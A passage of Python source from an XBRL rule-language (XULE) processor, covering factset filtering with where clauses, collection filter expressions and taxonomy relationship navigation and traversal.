                    alignment_value = model_to_xule_period(model_fact.context, xule_context)
                elif alignment_info == ('builtin', 'entity'):
                    alignment_value = model_to_xule_entity(model_fact.context, xule_context)
                elif alignment_info[TYPE] == 'explicit_dimension':
                    model_dimension = model_fact.context.qnameDims.get(alignment_info[ASPECT])
                    if model_dimension is None:
                        alignment_value = None
                    else:
                        if model_dimension.isExplicit:
                            alignment_value = model_dimension.memberQname
                        else:
                            alignment_value = model_dimension.typedMember.xValue
                            # NEED TO CHECK WHAT THE VALUE SHOULD BE
                else:
                    raise XuleProcessingError(_(
                        "Pushing nested factset filter alignment, found unknown alignment '%s : %s'" % alignment_info),
                        xule_context)
                if alignment is None:
                    # There was no alignment, but now an aspect is being added to the alignment
                    alignment = {}  # dict
                alignment[alignment_info] = alignment_value

        '''Check closed factset'''
        if factset['factsetType'] == 'closed':
            aspect_dimensions = {aspect_info[ASPECT] for aspect_info in non_align_aspects}
            if set(model_fact.context.qnameDims.keys()) - aspect_dimensions:
                # The fact carries dimensions not named in the factset - excluded by 'closed'.
                continue

        if alignment is not None:
            # if not current_no_alignment and xule_context.iteration_table.is_dependent:
            # if not current_no_alignment and factset['is_dependent']:
            if factset['is_dependent']:
                if xule_context.dependent_alignment is not None:
                    if frozenset(alignment.items()) != xule_context.dependent_alignment:
                        # If this is in a 'with' clause, the first factset to be added to the with/agg table may be empty, The current alignment will be
                        # from a higher table which will not include the with filter aspects.
                        if len(
                                nested_filters) > 0 and xule_context.iteration_table.current_table.current_alignment is None:
                            remove_aspects = [(nested_filter[0], nested_filter[1]) for nested_filter in nested_filters]
                            adjusted_alignment = remove_from_alignment(frozenset(alignment.items()), remove_aspects,
                                                                       xule_context)
                            if adjusted_alignment != xule_context.dependent_alignment:
                                continue  # try the next fact from the pre match
                        else:
                            continue  # try the next fact from the pre match

        if factset.get('nilDefault', False) and model_fact.isNil:
            # Handle nil value where the value should be defaulted.
            # The default depends on the fact's base XBRL type: 0 for monetary/decimal-ish,
            # 0.0 for floats, 0 for integers, '' for strings; otherwise no default.
            if (model_fact.concept.baseXbrliTypeQname == qname('http://www.xbrl.org/2003/instance',
                                                               'monetaryItemType') or
                    model_fact.concept.baseXbrliTypeQname == qname('http://www.xbrl.org/2003/instance',
                                                                   'decimalItemType') or
                    model_fact.concept.baseXbrliTypeQname == qname('http://www.xbrl.org/2003/instance',
                                                                   'sharesItemType') or
                    model_fact.concept.baseXbrliTypeQname == qname('http://www.xbrl.org/2003/instance',
                                                                   'pureItemType')):
                xule_type = 'decimal'
                system_value = decimal.Decimal(0)
            elif (model_fact.concept.baseXbrliTypeQname == qname('http://www.xbrl.org/2003/instance',
                                                                 'floatItemType') or
                  model_fact.concept.baseXbrliTypeQname == qname('http://www.xbrl.org/2003/instance',
                                                                 'doubleItemType')):
                xule_type = 'float'
                system_value = 0.0
            elif (model_fact.concept.baseXbrliTypeQname == qname('http://www.xbrl.org/2003/instance',
                                                                 'integerItemType') or
                  model_fact.concept.baseXbrliTypeQname == qname('http://www.xbrl.org/2003/instance',
                                                                 'nonPositiveIntegerItemType') or
                  model_fact.concept.baseXbrliTypeQname == qname('http://www.xbrl.org/2003/instance',
                                                                 'longItemType') or
                  model_fact.concept.baseXbrliTypeQname == qname('http://www.xbrl.org/2003/instance',
                                                                 'intItemType') or
                  model_fact.concept.baseXbrliTypeQname == qname('http://www.xbrl.org/2003/instance',
                                                                 'shortItemType') or
                  model_fact.concept.baseXbrliTypeQname == qname('http://www.xbrl.org/2003/instance',
                                                                 'nonNegativeIntegerItemType') or
                  model_fact.concept.baseXbrliTypeQname == qname('http://www.xbrl.org/2003/instance',
                                                                 'unsignedLongItemType') or
                  model_fact.concept.baseXbrliTypeQname == qname('http://www.xbrl.org/2003/instance',
                                                                 'unsignedIntItemType') or
                  model_fact.concept.baseXbrliTypeQname == qname('http://www.xbrl.org/2003/instance',
                                                                 'unsignedShortItemType')):
                xule_type = 'int'
                system_value = 0
            elif (model_fact.concept.baseXbrliTypeQname == qname('http://www.xbrl.org/2003/instance',
                                                                 'stringItemType') or
                  model_fact.concept.baseXbrliTypeQname == qname('http://www.xbrl.org/2003/instance',
                                                                 'normalizedStringItemType')):
                xule_type = 'string'
                system_value = ''
            else:
                # There is no default value for the type of the fact
                system_value = model_fact
                xule_type = 'fact'
        else:
            system_value = model_fact
            xule_type = 'fact'

        fact_value = XuleValue(xule_context, system_value, xule_type,
                               alignment=None if alignment is None else frozenset(alignment.items()))
        # if not current_no_alignment:
        if alignment is not None:
            fact_value.aligned_result_only = True

        '''Where clause'''
        if 'whereExpr' in factset:
            # push the apsect variables
            ''' aspect_var_info is a tuple: 0 = aspect type, 1 = aspect name'''
            # aspect_vars_flat = list(aspect_vars.items())
            # for declaration_index, aspect_var_flat in enumerate(aspect_vars_flat, 1):
            for var_name, aspect_var_tuple in aspect_vars.items():
                aspect_type = aspect_var_tuple[0]
                aspect_name = aspect_var_tuple[1]
                # declaration_index = aspect_var_tuple[2]
                # declaration_id = (factset['node_id'], declaration_index)
                declaration_id = aspect_var_tuple[2]
                if aspect_type == 'builtin':
                    if aspect_name == 'concept':
                        xule_context.add_arg(var_name,
                                             declaration_id,
                                             None,
                                             XuleValue(xule_context, model_fact.concept, 'concept'),
                                             'single')
                    elif aspect_name == 'period':
                        if model_fact.context.isStartEndPeriod:
                            xule_context.add_arg(var_name,
                                                 declaration_id,
                                                 None,
                                                 XuleValue(xule_context, (model_fact.context.startDatetime,
                                                                          model_fact.context.endDatetime),
                                                           'duration', from_model=True),
                                                 'single')
                        elif model_fact.context.isInstantPeriod:
                            xule_context.add_arg(var_name,
                                                 declaration_id,
                                                 None,
                                                 XuleValue(xule_context, model_fact.context.instantDatetime,
                                                           'instant', from_model=True),
                                                 'single')
                        else:
                            # Forever period - represented as the maximal duration.
                            xule_context.add_arg(var_name,
                                                 declaration_id,
                                                 None,
                                                 XuleValue(xule_context, (datetime.datetime.min, datetime.datetime.max),
                                                           'duration', from_model=True),
                                                 'single')
                    elif aspect_name == 'unit':
                        xule_context.add_arg(var_name,
                                             declaration_id,
                                             None,
                                             XuleValue(xule_context, model_to_xule_unit(model_fact.unit, xule_context),
                                                       'unit'),
                                             'single')
                    elif aspect_name == 'entity':
                        xule_context.add_arg(var_name,
                                             declaration_id,
                                             None,
                                             XuleValue(xule_context, model_fact.context.entityIdentifier,
                                                       'entity'),
                                             'single')
                    else:
                        raise XuleProcessingError(_("Unknown built in aspect '%s'" % aspect_name), xule_context)
                elif aspect_type == 'explicit_dimension':
                    model_dimension = model_fact.context.qnameDims.get(aspect_name)
                    if model_dimension is None:
                        member = XuleValue(xule_context, None, 'qname')
                    else:
                        if model_dimension.isExplicit:
                            member = XuleValue(xule_context, model_dimension.memberQname, 'qname')
                        else:
                            # This is a typed dimension
                            member = XuleValue(xule_context, model_dimension.typedMember.xValue,
                                               model_to_xule_type(xule_context, model_dimension.typedMember.xValue))
                    xule_context.add_arg(var_name,
                                         declaration_id,
                                         None,  # tagged,
                                         member,
                                         'single')

            # add the $item variable for the fact
            xule_context.add_arg('fact',
                                 # (factset['node_id'], 0),
                                 factset['whereExpr']['node_id'],
                                 None,  # tagged
                                 fact_value,
                                 'single')

            '''The where clause is evaluated in a sub table.'''
            # switched_alignment = False
            # if xule_context.dependent_alignment is None and alignment is not None:
            #     switched_alignment = True
            #     #xule_context.iteration_table.current_table.dependent_alignment = frozenset(alignment.items())

            save_aligned_result_only = xule_context.aligned_result_only
            # save_used_vars = xule_context.used_vars
            save_used_expressions = xule_context.used_expressions
            # pre_aggregation_table_list_size = len(xule_context.iteration_table)
            where_table = xule_context.iteration_table.add_table(factset['whereExpr']['node_id'],
                                                                 xule_context.get_processing_id(
                                                                     factset['whereExpr']['node_id']),
                                                                 is_aggregation=True)
            # if switched_alignment:
            #     where_table.dependent_alignment = frozenset(alignment.items())
            try:
                # Iterate the where sub-table until it is exhausted; each pass is one iteration
                # of the where expression for this fact.
                while True:
                    xule_context.aligned_result_only = False
                    # xule_context.used_vars = []
                    xule_context.used_expressions = set()
                    where_matched = True
                    try:
                        where_value = evaluate(factset['whereExpr'], xule_context)
                    except XuleIterationStop as xis:
                        where_value = xis.stop_value  # XuleValue(xule_context, None, 'unbound')
                    finally:
                        # if xule_context.iteration_table.current_table.current_alignment is None and xule_context.aligned_result_only:
                        #     where_value = XuleValue(xule_context, None, 'unbound')
                        xule_context.aligned_result_only = save_aligned_result_only

                    if alignment is not None:
                        # if not current_no_alignment and xule_context.iteration_table.is_dependent:
                        # if not current_no_alignment and factset['is_dependent']:
                        if factset['is_dependent']:
                            if xule_context.dependent_alignment is not None:
                                if frozenset(alignment.items()) != xule_context.dependent_alignment:
                                    # If this is in a 'with' clause, the first factset to be added to the with/agg table may be empty, The current alignment will be
                                    # from a higher table which will not inlucde the with filter aspects.
                                    if len(
                                            nested_filters) > 0 and xule_context.iteration_table.current_table.current_alignment is None:
                                        remove_aspects = [(nested_filter[0], nested_filter[1]) for nested_filter in
                                                          nested_filters]
                                        adjusted_alignment = remove_from_alignment(frozenset(alignment.items()),
                                                                                   remove_aspects, xule_context)
                                        if adjusted_alignment != xule_context.dependent_alignment:
                                            where_matched = False
                                    else:
                                        where_matched = False

                    if where_matched:
                        default_used_expressions.update(set(xule_context.used_expressions))
                        if where_value.type in ('unbound', 'none'):
                            pass
                        elif where_value.type == 'bool':
                            if where_value.value:
                                # The fact passes the where clause - record a copy with the
                                # facts/tags accumulated during this where iteration.
                                new_fact_value = copy.copy(fact_value)
                                new_fact_value.facts = xule_context.iteration_table.facts.copy()
                                new_fact_value.tags = xule_context.iteration_table.tags.copy()
                                # new_fact_value.used_vars = get_used_vars(xule_context, pre_matched_used_var_ids + xule_context.used_vars)
                                new_fact_value.used_expressions = pre_matched_used_expressoins_ids | xule_context.used_expressions
                                results.append(new_fact_value)
                            '''It may be that the false value should also be included with an unbound value'''
                        else:
                            raise XuleProcessingError(_(
                                "Where clause in a factset did not evaluate to a boolean. Found '%s'." % where_value.type),
                                xule_context)
                    # xule_context.iteration_table.del_current()
                    # if len(xule_context.iteration_table) == pre_aggregation_table_list_size:
                    xule_context.iteration_table.next(where_table.table_id)
                    if where_table.is_empty:
                        break
            finally:
                # remove $item
                xule_context.del_arg('fact',  # (factset['node_id'], 0),
                                     factset['whereExpr']['node_id'], )
                # remove aspect variables
                for var_name, aspect_var_tuple in aspect_vars.items():
                    declaration_id = aspect_var_tuple[2]
                    xule_context.del_arg(var_name, declaration_id)
                # remove where table (if this is the result of an exception the where table may be left behind)
                xule_context.iteration_table.del_table(where_table.table_id)
                # restore aligned results, used_vars and used_expressoins
                # xule_context.aligned_result_only = save_aligned_result_only
                # xule_context.used_vars = save_used_vars
                xule_context.used_expressions = save_used_expressions
        else:
            # No where clause - the fact value is a result as-is.
            # fact_value.used_vars = get_used_vars(xule_context, pre_matched_used_var_ids)
            fact_value.used_expressions = pre_matched_used_expressoins_ids
            results.append(fact_value)

    return results, default_used_expressions
# def evaluate_dict(dict_expr, xule_context):
# result_dict = dict()
# result_shadow = dict()
#
# for pair in dict_expr['items']:
# key = evaluate(pair['key'], xule_context)
# value = evaluate(pair['value'], xule_context)
#
# if key.type == 'dictionary':
# raise XuleProcessingError(_("Key to a dictionary cannot be a dictionary."), xule_context)
#
# if key.shadow_collection if key.type in ('set', 'list') else key.value not in result_shadow:
# result_dict[key] = value
# result_shadow[key.shadow_collection if key.type in (
# 'set', 'list') else key.value] = value.shadow_collection if value.type in (
# 'set', 'list', 'dictionary') else value.value
#
# return XuleValue(xule_context, frozenset(result_dict.items()), 'dictionary',
# shadow_collection=frozenset(result_shadow.items()))
#
#
# def evaluate_list(list_expr, xule_context):
# result = list()
# result_shadow = list()
# for item in list_expr['items']:
# item_value = evaluate(item, xule_context)
# result.append(item_value)
# result_shadow.append(item_value.value)
#
# return XuleValue(xule_context, tuple(result), 'list', shadow_collection=tuple(result_shadow))
#
#
# def evaluate_set(set_expr, xule_context):
# result = list()
# result_shadow = list()
# for item in set_expr['items']:
# item_value = evaluate(item, xule_context)
# if item_value.shadow_collection if item_value.type in (
# 'set', 'list', 'dictionary') else item_value.value not in result_shadow:
# result.append(item_value)
# result_shadow.append(item_value.value)
#
# return XuleValue(xule_context, frozenset(result), 'set', shadow_collection=frozenset(result_shadow))
def evaluate_filter(filter_expr, xule_context):
    """Evaluate a filter expression over a 'set' or 'list' value.

    Applies the optional 'whereExpr' (boolean keep-test) and 'returnsExpr'
    (per-item projection) clauses to each item of the collection. The result
    preserves the collection type of the input; for sets, duplicates are
    detected via the shadow (plain python) values.

    Arguments:
        filter_expr (dict): The filter expression AST node.
        xule_context (XuleRuleContext): The processing context.

    Returns:
        XuleValue: A 'set' or 'list' of the kept (possibly projected) items.

    Raises:
        XuleProcessingError: If the filtered value is not a set/list or the
            where clause does not evaluate to a boolean.
    """
    collection_value = evaluate(filter_expr['expr'], xule_context)
    if collection_value.type not in ('set', 'list'):
        raise XuleProcessingError(
            _("Filter expresssion can only be used on a 'set' or 'list', found '{}'.".format(collection_value.type)),
            xule_context)
    # do nothing if there is no filtering
    if 'whereExpr' not in filter_expr and 'returnsExpr' not in filter_expr:
        return collection_value
    if collection_value.type == 'set':
        results = set()
        results_shadow = set()
    else:  # list
        results = list()
        results_shadow = list()
    for item_number, item_value in enumerate(collection_value.value):
        # Expose the current item to the where/returns expressions as the 'item' variable.
        xule_context.add_arg('item',
                             filter_expr['expr']['node_id'],
                             None,
                             item_value,
                             'single')
        try:
            # The column prefix isolates per-item alignment of evaluated results.
            xule_context.column_prefix.append("{}-{}".format(filter_expr['node_id'], item_number))
            try:
                keep = True
                if 'whereExpr' in filter_expr:
                    keep = False
                    filter_where_result = evaluate(filter_expr['whereExpr'], xule_context)
                    if filter_where_result.type == 'bool':
                        keep = filter_where_result.value
                    elif filter_where_result.type not in ('unbound', 'none'):
                        raise XuleProcessingError(_(
                            "The where clause on a filter expression must evaluate to a boolean, found '{}'.".format(
                                filter_where_result.type)), xule_context)
                if keep:
                    if 'returnsExpr' in filter_expr:
                        keep_item = evaluate(filter_expr['returnsExpr'], xule_context)
                    else:
                        keep_item = item_value
                    if collection_value.type == 'set':
                        # Use the shadow (plain python) value to detect duplicates in the set.
                        if (keep_item.shadow_collection if keep_item.type in (
                                'list', 'set', 'dictionary') else keep_item.value) not in results_shadow:
                            results.add(keep_item)
                            results_shadow.add(keep_item.shadow_collection if keep_item.type in (
                                'list', 'set', 'dictionary') else keep_item.value)
                        # otherwise, this a duplicate
                    else:  # list
                        results.append(keep_item)
                        results_shadow.append(keep_item.shadow_collection if keep_item.type in (
                            'list', 'set', 'dictionary') else keep_item.value)
            finally:
                # remove the args
                xule_context.del_arg('item',
                                     filter_expr['expr']['node_id'])
        finally:
            xule_context.column_prefix.pop()
    if collection_value.type == 'set':
        return XuleValue(xule_context, frozenset(results), 'set', shadow_collection=frozenset(results_shadow))
    else:  # list
        return XuleValue(xule_context, tuple(results), 'list', shadow_collection=tuple(results_shadow))
def evaluate_navigate(nav_expr, xule_context):
    """Evaluate a navigate expression against a taxonomy's relationship networks.

    Resolves the taxonomy, role/arcrole, from/to concepts and direction from
    the AST node, traverses the matching relationship sets (dimensional or
    regular), decorates each traversed relationship with the requested return
    components, and hands the collected items to nav_finish_results for final
    packaging (list/set/paths, optionally grouped by network).

    Arguments:
        nav_expr (dict): The navigation expression AST node.
        xule_context (XuleRuleContext): The processing context.

    Returns:
        XuleValue: The finished navigation result (see nav_finish_results).
    """
    # Get the taxonomy
    if 'taxonomy' in nav_expr:
        dts_value = evaluate(nav_expr['taxonomy'], xule_context)
        if dts_value.type != 'taxonomy':
            raise XuleProcessingError(
                _("Expecting a taxonomy for the 'taxonomy' clause of navigate. Found {}.".format(dts_value.type)),
                xule_context)
        dts = dts_value.value
    else:
        # Default to the taxonomy of the instance
        dts = xule_context.model
    # Set up the variables for the results of the traversal
    return_by_networks = nav_expr.get('return', dict()).get('byNetwork', False)
    if return_by_networks:
        results_by_networks = dict()
    result_items = list()
    # Determine if we are returning paths.
    paths = nav_expr.get('return', dict()).get('paths', False)
    return_names = get_return_component_names(nav_expr, xule_context)
    # Get the from and to concepts if they are supplied in the expression
    nav_from_concepts = nav_get_element(nav_expr, 'from', dts, xule_context)
    nav_to_concepts = nav_get_element(nav_expr, 'to', dts, xule_context)
    # This checks if there was a 'from' concept in the expression, but no concepts were returned. Same for the 'to'
    # concept in the expression. Then there is no navigation to do.
    if (nav_from_concepts is None or len(nav_from_concepts) > 0) and (
            nav_to_concepts is None or len(nav_to_concepts) > 0):
        arcrole = nav_get_role(nav_expr, 'arcrole', dts, xule_context)
        role = nav_get_role(nav_expr, 'role', dts, xule_context)
        link_qname = evaluate(nav_expr['linkbase'], xule_context).value if 'linkbase' in nav_expr else None
        arc_qname = None  # This is always none.
        dimension_arcroles = None
        # Find the relationships
        if (('arcrole' in nav_expr and arcrole is None) or
                ('role' in nav_expr and role is None) or
                ('linkbase' in nav_expr and link_qname is None)):
            # There are no networks to navigate
            relationship_sets = list()
        else:
            # get the relationships
            if nav_expr.get('dimensional'):
                # Dimensional navigation: use the dimension cubes instead of plain base sets.
                drs_role = nav_get_role(nav_expr, 'drsRole', dts, xule_context)
                table_concepts = nav_get_element(nav_expr, 'cube', dts, xule_context)
                if arcrole is not None:
                    dimension_arcroles = xc.DIMENSION_PSEDDO_ARCROLES.get(arcrole, ('all', {arcrole, }))
                # relationship_sets = [XuleUtility.dimension_set(dts, x) for x in XuleUtility.base_dimension_sets(dts) if ((drs_role is None or x[XuleUtility.DIMENSION_SET_ROLE] == drs_role) and
                #                                                                          (table_concepts is None or x[XuleUtility.DIMENSION_SET_HYPERCUBE] in table_concepts))]
                relationship_sets = [XuleDimensionCube(dts, *x) for x in XuleDimensionCube.base_dimension_sets(dts) if
                                     ((drs_role is None or x[XuleDimensionCube.DIMENSION_SET_ROLE] == drs_role) and
                                      (table_concepts is None or x[
                                          XuleDimensionCube.DIMENSION_SET_HYPERCUBE] in table_concepts))]
            else:
                relationship_set_infos = XuleProperties.get_base_set_info(dts, arcrole, role, link_qname, arc_qname)
                relationship_sets = [XuleUtility.relationship_set(dts, x) for x in relationship_set_infos]
        direction = nav_expr['direction']
        include_start = nav_expr.get('includeStart', False)
        for relationship_set in relationship_sets:
            if nav_from_concepts is None:
                # The from was not in the navigate expression. Use the roots
                from_concepts = relationship_set.rootConcepts
            else:
                from_concepts = nav_from_concepts
            for from_concept in from_concepts:
                # if direction == 'self':
                #     # include_start is always False for the self direction since the self concept is always included.
                #     for rel in relationship_set.fromModelObject(from_concept):
                #         result_items += nav_decorate({'relationship': rel, 'network': get_network_info(relationship_set, xule_context)}, 'from', return_names, False, xule_context)
                #     for rel in relationship_set.toModelObject(from_concept):
                #         result_items += nav_decorate({'relationship':rel, 'network': get_network_info(relationship_set, xule_context)}, 'to', return_names, False, xule_context)
                #     #result_items += list(y for y in (nav_decorate(rel, 'from', nav_expr, False, xule_context) for rel in relationship_set.fromModelObject(from_concept))) + list(y for y in (nav_decorate(rel, 'to', nav_expr, xule_context) for rel in relationship_set.toModelObject(from_concept))) # This will be a list
                # Each direction maps to an up/down traversal with a depth limit.
                if direction == 'descendants':
                    for rel in nav_traverse(nav_expr, xule_context, 'down', relationship_set, from_concept,
                                            nav_to_concepts, int(nav_expr['depth']), return_names, dimension_arcroles):
                        result_items += nav_decorate(rel, 'down', return_names, include_start, paths, xule_context)
                if direction == 'children':
                    for rel in nav_traverse(nav_expr, xule_context, 'down', relationship_set, from_concept,
                                            nav_to_concepts, 1, return_names, dimension_arcroles):
                        result_items += nav_decorate(rel, 'down', return_names, include_start, paths, xule_context)
                if direction == 'ancestors':
                    for rel in nav_traverse(nav_expr, xule_context, 'up', relationship_set, from_concept,
                                            nav_to_concepts, int(nav_expr['depth']), return_names, dimension_arcroles):
                        result_items += nav_decorate(rel, 'up', return_names, include_start, paths, xule_context)
                if direction == 'parents':
                    for rel in nav_traverse(nav_expr, xule_context, 'up', relationship_set, from_concept,
                                            nav_to_concepts, 1, return_names, dimension_arcroles):
                        result_items += nav_decorate(rel, 'up', return_names, include_start, paths, xule_context)
                if direction == 'siblings':
                    # Siblings: go up one level, then back down one level from the parent.
                    for parent_rel in nav_traverse(nav_expr, xule_context, 'up', relationship_set, from_concept, None,
                                                   1, list(), dimension_arcroles):
                        for sibling_rel in nav_traverse(nav_expr, xule_context, 'down', relationship_set,
                                                        parent_rel['relationship'].fromModelObject, nav_to_concepts, 1,
                                                        return_names, dimension_arcroles):
                            if include_start or sibling_rel['relationship'] is not parent_rel['relationship']:
                                result_items += nav_decorate(sibling_rel, 'down', return_names, False, paths,
                                                             xule_context)
                if direction == 'previous-siblings':
                    # Previous siblings: same as 'siblings' but stop once the starting relationship is reached.
                    for parent_rel in nav_traverse(nav_expr, xule_context, 'up', relationship_set, from_concept, None,
                                                   1, list(), dimension_arcroles):
                        for sibling_rel in nav_traverse(nav_expr, xule_context, 'down', relationship_set,
                                                        parent_rel['relationship'].fromModelObject, nav_to_concepts, 1,
                                                        return_names, dimension_arcroles):
                            if include_start or sibling_rel['relationship'] is not parent_rel['relationship']:
                                result_items += nav_decorate(sibling_rel, 'down', return_names, False, paths,
                                                             xule_context)
                            if sibling_rel['relationship'] is parent_rel['relationship']:
                                break  # We are done.
                if direction == 'following-siblings':
                    # Following siblings: skip siblings until the starting relationship is found.
                    for parent_rel in nav_traverse(nav_expr, xule_context, 'up', relationship_set, from_concept, None,
                                                   1, list(), dimension_arcroles):
                        start_rel_found = False
                        for sibling_rel in nav_traverse(nav_expr, xule_context, 'down', relationship_set,
                                                        parent_rel['relationship'].fromModelObject, nav_to_concepts, 1,
                                                        return_names, dimension_arcroles):
                            if sibling_rel['relationship'] is parent_rel['relationship']:
                                start_rel_found = True
                            if start_rel_found:
                                if include_start or sibling_rel['relationship'] is not parent_rel['relationship']:
                                    result_items += nav_decorate(sibling_rel, 'down', return_names, False, paths,
                                                                 xule_context)
            if return_by_networks:
                # Group the items collected for this network and reset for the next one.
                if len(result_items) > 0:
                    results_by_networks[get_network_info(relationship_set, xule_context)] = result_items
                    result_items = list()
    if return_by_networks:
        return nav_finish_results(nav_expr, results_by_networks, 'result-order' in return_names, xule_context)
    else:
        return nav_finish_results(nav_expr, result_items, 'result-order' in return_names, xule_context)
def nav_traverse(nav_expr, xule_context, direction, network, parent, end_concepts, remaining_depth, return_names,
                 dimension_arcroles=None, previous_concepts=None, nav_depth=1, result_order=0,
                 arc_attribute_names=None):
    """Traverse a network of relationships recursively.

    Arguments:
        nav_expr (dict): The navigation expression AST node
        xule_context (XuleRuleContext): The processing context
        direction (string): Either 'down' or 'up'
        network (ModelRelationshipSet): The network of relationships.
        parent (ModelConcept): The parent concept
        end_concepts (set of ModelConcepts): A set of concepts; if encountered the traversal should stop
        remaining_depth (int): How many levels left to traverse. -1 is infinite depth.
        return_names (list): Requested return component names; QName entries name arc attributes to capture
        dimension_arcroles: Allowed arcrole/side restriction for dimensional navigation, or None
        previous_concepts (set of ModelConcepts): Concepts already traversed. Used to prevent loops in the traversal
        nav_depth (int): Current depth of the traversal (1-based)
        result_order (int): Running result order counter (currently unused in the output)
        arc_attribute_names (set of QName): Arc attribute names to capture on each relationship
    Return:
        When the 'paths' return option is set, a list of paths (each a list of
        rel_info dicts); otherwise a flat list of rel_info dicts.
    """
    # Initialize previous_concepts
    if previous_concepts is None:  # this only happens on the intial call.
        previous_concepts = {parent, }
        arc_attribute_names = {x for x in return_names if isinstance(x, QName)}
        first_time = True
    else:
        first_time = False
    if end_concepts is None:
        end_concepts = set()
    # initialize depth
    # NOTE(review): 'depth' is assigned but never read; infinite traversal works
    # because remaining_depth only decrements from -1 and never reaches 0.
    if remaining_depth == -1:
        depth = float('inf')
    if remaining_depth == 0:
        return list()
    paths = nav_expr.get('return', dict()).get('paths', False)
    # 'children' are parents if the direction is up.
    children = list()
    if parent in end_concepts:
        # This should only happen if in the inital call to nav_traverse the parent is in the list of
        # end concepts. In this case there is no navigation.
        return children
    children_method = network.fromModelObject if direction == 'down' else network.toModelObject
    for rel_number, rel in enumerate(sorted(children_method(parent), key=lambda x: x.order or 1), 1):
        inner_children = list()
        child = rel.toModelObject if direction == 'down' else rel.fromModelObject
        rel_info = {'relationship': rel}
        if first_time:
            rel_info['first'] = True
        if 'network' in return_names:
            rel_info['network'] = get_network_info(network, xule_context)
        if 'navigation-order' in return_names:
            rel_info['navigation-order'] = rel_number
        if 'navigation-depth' in return_names:
            rel_info['navigation-depth'] = nav_depth
        # if 'result-order' in return_names:
        #    rel_info['result-order'] = result_order
        for arc_attribute_name in arc_attribute_names:
            rel_info[arc_attribute_name] = rel.arcElement.get(arc_attribute_name.clarkNotation)
        # Decide if the child will be in the results. If the child is not in the results, the navigation does not stop.
        if not (
                nav_traverse_where(nav_expr, 'whereExpr', rel, xule_context) and
                (
                        dimension_arcroles is None or
                        'dimensional' not in nav_expr or
                        ('dimensional' in nav_expr and rel.arcrole in dimension_arcroles[
                            xc.DIMENSION_PSEUD0_ARCROLE_PART] and
                         (
                                 dimension_arcroles[xc.DIMENSION_PSEUD0_SIDE] == 'all' or
                                 rel.side == dimension_arcroles[xc.DIMENSION_PSEUD0_SIDE]
                         )
                         )
                )
        ):
            # Filtered out: keep traversing through this node but exclude the relationship from results.
            rel_info['relationship'] = None
        keep_rel = rel_info
        if child not in previous_concepts:
            if child in end_concepts:
                # This is the end of the traversal because the child is a 'to' concept.
                if paths:
                    inner_children.append([keep_rel, ])
                else:
                    inner_children += [keep_rel, ]
            else:
                if nav_traverse_where(nav_expr, 'stopExpr', rel, xule_context):
                    next_children = list()
                else:
                    next_children = nav_traverse(nav_expr,
                                                 xule_context,
                                                 direction,
                                                 network,
                                                 child,
                                                 end_concepts,
                                                 remaining_depth - 1,
                                                 return_names,
                                                 dimension_arcroles,
                                                 previous_concepts | {child, },
                                                 nav_depth + 1,
                                                 result_order,
                                                 arc_attribute_names)
                if len(next_children) == 0 and len(end_concepts) > 0:  # The to concept was never found
                    # Reset the inner_child list. This will throw away all results that lead to this moment.
                    inner_children = list()
                else:
                    if paths:
                        if len(next_children) == 0:
                            # On a leaf. This is where a path is initially created.
                            inner_children.append([keep_rel, ])
                        else:
                            # There are children of the current child (keep_rel), add the current child to each of the paths from the current childs children
                            for i in next_children:
                                inner_children.append([keep_rel, ] + i)
                    else:
                        inner_children += [keep_rel, ] + next_children
        else:
            if keep_rel['relationship'] is not None:
                # indicates a cycle
                keep_rel['cycle'] = True
            if paths:
                inner_children.append([keep_rel, ])
            else:
                inner_children.append(keep_rel)
        children += inner_children
        # This only allows the first child of the initial call to nav_traverse to be marked as first. The first is used to indicate when to use
        # the from side of the relationship for 'include start'.
        if not paths:
            first_time = False
    return children
def nav_traverse_where(nav_expr, clause_name, relationship, xule_context):
    """Evaluate the 'whereExpr' or 'stopExpr' clause of a navigation expression.

    Arguments:
        nav_expr (dict): The navigation expression AST node.
        clause_name (str): Either 'whereExpr' or 'stopExpr'.
        relationship: The relationship being tested; exposed to the clause as
            the 'relationship' variable.
        xule_context (XuleRuleContext): The processing context.

    Returns:
        bool: If the clause is absent, True for 'whereExpr' (keep everything)
        and False for 'stopExpr' (never stop). Otherwise the boolean result of
        the clause; 'unbound'/'none' results count as False.

    Raises:
        XuleProcessingError: If the clause does not evaluate to a boolean.
    """
    if clause_name not in nav_expr:
        # Absent where clause keeps all relationships; absent stop clause never stops.
        return clause_name == 'whereExpr'
    xule_context.add_arg('relationship',
                         nav_expr[clause_name]['node_id'],
                         None,
                         XuleValue(xule_context, relationship, 'relationship'),
                         'single')
    try:
        nav_where_results = evaluate(nav_expr[clause_name], xule_context)
    finally:
        # remove the args
        xule_context.del_arg('relationship',
                             nav_expr[clause_name]['node_id'])
    if nav_where_results.type == 'bool':
        return nav_where_results.value
    elif nav_where_results.type in ('unbound', 'none'):
        return False
    else:
        # BUG FIX: this branch previously read 'filter_where_result' (an undefined
        # name copied from evaluate_filter), raising a NameError instead of the
        # intended XuleProcessingError.
        raise XuleProcessingError(_(
            "The {} clause on a navigation expression must evaluate to a boolean, found '{}'.".format(
                clause_name[:clause_name.find('Expr')], nav_where_results.type)), xule_context)
def nav_get_role(nav_expr, role_type, dts, xule_context):
    """Resolve a role/arcrole clause of a navigation expression to a full URI.

    A role may be written as a string/uri (used as-is), a role value (its URI
    is taken), or a non-prefixed qname whose local name is matched against the
    tail of known roles (the short form, e.g. parent-child). Returns None when
    the clause is not present in the expression.
    """
    if role_type not in nav_expr:
        return None  # There is no arcrole on the navigation expression
    role_value = evaluate(nav_expr[role_type], xule_context)
    if role_value.type in ('string', 'uri'):
        return role_value.value
    if role_value.type == 'qname':
        return XuleUtility.resolve_role(role_value, role_type, dts, xule_context)
    if role_value.type == 'role':
        return role_value.value.roleURI
    raise XuleProcessingError(_("Navigation is expecting a role (role, string, uri, or short role name), found '{}'.".format(role_value.type)), xule_context)
def nav_get_element(nav_expr, side, dts, xule_context):
    """Resolve the 'from' or 'to' side of a navigation expression to concepts.

    Evaluates the side expression when present. A qname is looked up in the
    taxonomy; a concept is used directly; a set/list is flattened to the
    concepts it contains (qnames that do not resolve are silently dropped).

    Arguments:
        nav_expr (dict): The navigation expression AST node
        side (str): Either 'from' or 'to'.
        dts: The taxonomy model to resolve qnames against.
        xule_context (XuleRuleContext): The processing context

    Returns:
        None when the side is absent from the expression; otherwise a set of
        concepts (possibly empty when a qname does not resolve).
    """
    if side not in nav_expr:
        return None  # The side is not in the navigation expression
    side_value = evaluate(nav_expr[side], xule_context)
    if side_value.type == 'qname':
        found_concept = XuleProperties.get_concept(dts, side_value.value)
        return set() if found_concept is None else {found_concept, }
